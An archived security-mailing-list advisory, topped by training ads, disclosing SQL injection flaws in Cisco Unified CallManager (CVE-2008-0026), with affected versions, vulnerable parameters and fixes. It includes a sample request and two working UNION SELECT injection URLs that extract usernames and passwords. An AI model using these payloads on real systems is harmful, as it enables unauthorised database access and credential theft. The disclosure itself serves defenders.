Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[NEWS] Cisco Unified CallManager Multiple SQL Injections in User And Adm

Subject: [NEWS] Cisco Unified CallManager Multiple SQL Injections in User And Admin Interface
Date: 26 Feb 2008 15:44:51 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Cisco Unified CallManager Multiple SQL Injections in User And Admin 
Interface
------------------------------------------------------------------------


SUMMARY

The Cisco Unified CallManager is vulnerable to multiple SQL injections in 
the user interface as well as in the administration interface.

DETAILS

Vulnerable Systems:
 * Cisco Unified CallManager version 5.0.4.2000-1
 * Cisco Unified CallManager version 5.1
 * Cisco Unified CallManager version 6.0-6.1

Immune Systems:
 * Cisco Unified CallManager version 6.1a
 * Cisco Unified CallManager version 5.1(3a)

The value of the 'key' parameter used in various GET requests is not 
properly sanitized and it is therefore possible to inject SQL queries.

In addition, the application discloses table and attribute names in the 
'primaryTable' and 'dispCols' parameters of some POST requests. Another 
SQL injection point can be found there.

The following is a simplified POST request:
POST 
/ccmuser/personaladdressbookFindList.do?%3C%=reqParams%%3E&recCnt=1&colCnt=4 
HTTP/1.1
Host: example.org
Referer: https://example.org/ccmuser/personaladdressbookFindList.do
Cookie: JSESSIONID=D650CB2B43F85CD8D260B69A948FA7B5;
JSESSIONIDSSO=315C472AA4B90A6765D4EDEFAC24897C
Content-Length: 170

org.apache.struts.taglib.html.TOKEN=9a4f6e1e4e11a72ed4be0981c26e6f53&
primaryTable=personaladdressbook&dispCols=pkid%23nickname%23firstname%23lastname&
searchField=nickname

Impact:
Attackers need access to either the user or administration interface. They 
then might be able to read data from the database such as password hashes.

Exploit:
Proof of concept exploit code is not required. The injection points are 
the 'key' or the 'primaryTable' and 'dispCols' parameters.

E.g.:
https://example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+
SELECT+'','',firstname,lastname,userid,password+from+enduser;-- 

or
https://example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+
SELECT+'','','',user,'',password+from+applicationuser;-- 

Vendor Status:
Vendor contacted -   Cisco advise that they will be  using bug ID 
CSCsk64286 for this incident. The Cisco advisory is now available at:  
<http://www.cisco.com/warp/customer/707/cisco-sa-20080213-cucmsql.shtml> 
http://www.cisco.com/warp/customer/707/cisco-sa-20080213-cucmsql.shtml

The vendor has advised that the CUCM versions not vulnerable to this issue 
are 5.1(3a) and 6.1(1a).

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0026> 
CVE-2008-0026


ADDITIONAL INFORMATION

The information has been provided by  
<mailto:advisories@portcullis-security.com> Portcullis Computer Security.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [NEWS] Cisco Unified CallManager Multiple SQL Injections in User And Admin Interface, SecuriTeam <=